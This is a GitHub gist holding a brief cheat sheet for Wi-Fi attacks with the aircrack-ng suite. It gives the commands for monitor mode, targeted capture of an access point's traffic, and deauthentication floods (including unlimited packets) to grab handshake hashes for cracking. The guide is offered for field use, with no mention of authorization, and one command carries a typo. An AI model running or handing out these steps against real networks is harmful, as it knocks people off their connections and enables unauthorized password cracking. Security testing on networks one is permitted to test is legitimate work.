Skip to content

Instantly share code, notes, and snippets.

@0xjmux
Last active March 28, 2018 00:50
Show Gist options
  • Save 0xjmux/f8fb5be70e9385c53d14f9f6fee7e674 to your computer and use it in GitHub Desktop.
Save 0xjmux/f8fb5be70e9385c53d14f9f6fee7e674 to your computer and use it in GitHub Desktop.

Wifi captures and deauthentication

This is a little doc teaching you how to do wifi attacks. I always forget how to do it in the field, so here's a guide for when you're away from wifi. It's quick, and isn't overreaching on the info so you can reference it quickly. every command here must be run as root

We're going to assume wlan0 is the network interface you want to use. If you have time, read the man pages.

  1. Starting your reciever into monitor mode airmon-ng startwlan0 When you'r done, you can do airmon-ng stop wlan0mon.

  2. Capturing nearby networks Your wireless interface should be renamed to something along the lines of wlan0mon. airodump-ng -c 10 --bssid 00:1C:B3:09:85:15 wlan0mon\

    • -c 10 is the channel (if you don't know it, leave it out)
    • --bssid 00:1C:B3:09:85:15 is the mac of the access point (again, if you don't know it, leave it out)
    • wlan0mon is the interface (you have to include this)
  3. Deauthentication aireplay-ng -b 00:1C:B3:09:85:15 -0 5 wlan0mon

    • -b stands for bssid, which is the mac of the access point you want to deauth
    • -0 5 selects deauthentication attack, and sends 5 deauth packets (set to 0 to send an unlimited number)
    • wlan0mon is the interface

If your airodump says you've captured the hashes, you're good to go with cracking!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment